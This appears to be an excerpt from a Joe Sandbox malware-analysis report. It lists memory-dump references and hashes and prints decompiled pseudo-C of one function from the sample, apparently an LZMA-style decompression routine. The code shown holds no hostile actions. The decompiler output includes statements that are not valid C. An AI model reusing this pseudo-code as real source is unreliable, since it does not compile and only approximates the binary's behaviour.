0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x0040726d
0x0040726a
0x00000000
0x00406fbf

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F07 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406F07() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
